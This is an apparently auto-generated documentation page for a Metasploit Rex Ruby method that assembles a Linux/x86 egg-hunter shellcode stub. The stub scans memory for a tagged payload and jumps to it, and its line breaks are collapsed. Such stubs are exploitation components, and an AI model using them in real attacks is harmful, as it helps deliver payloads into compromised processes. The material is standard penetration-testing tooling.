The egg hunter stub for linux/x86.
# File lib/rex/exploitation/egghunter.rb, line 246 def hunter_stub(payload, badchars = '', opts = {}) startreg = opts[:startreg] raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4 marker = "0x%x" % opts[:eggtag].unpack('V').first checksum = checksum_stub(payload, badchars, opts) startstub = '' if startreg if startreg.downcase != 'ecx' startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr" else startstub = "\n\tjmp next_addr" end end startstub << "\n\t" if startstub.length > 0 assembly = cld#{startstub}check_readable: or cx,0xfffnext_addr: inc ecx push 0x43 ; use 'sigaction' syscall pop eax int 0x80 cmp al,0xf2 je check_readablecheck_for_tag: ; check that the tag matches once mov eax,#{marker} mov edi,ecx scasd jne next_addr ; it must match a second time too scasd jne next_addr ; check the checksum if the feature is enabled#{checksum} ; jump to the payload jmp edi assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string # return the stub assembled_code end
Generated with the Darkfish Rdoc Generator 2.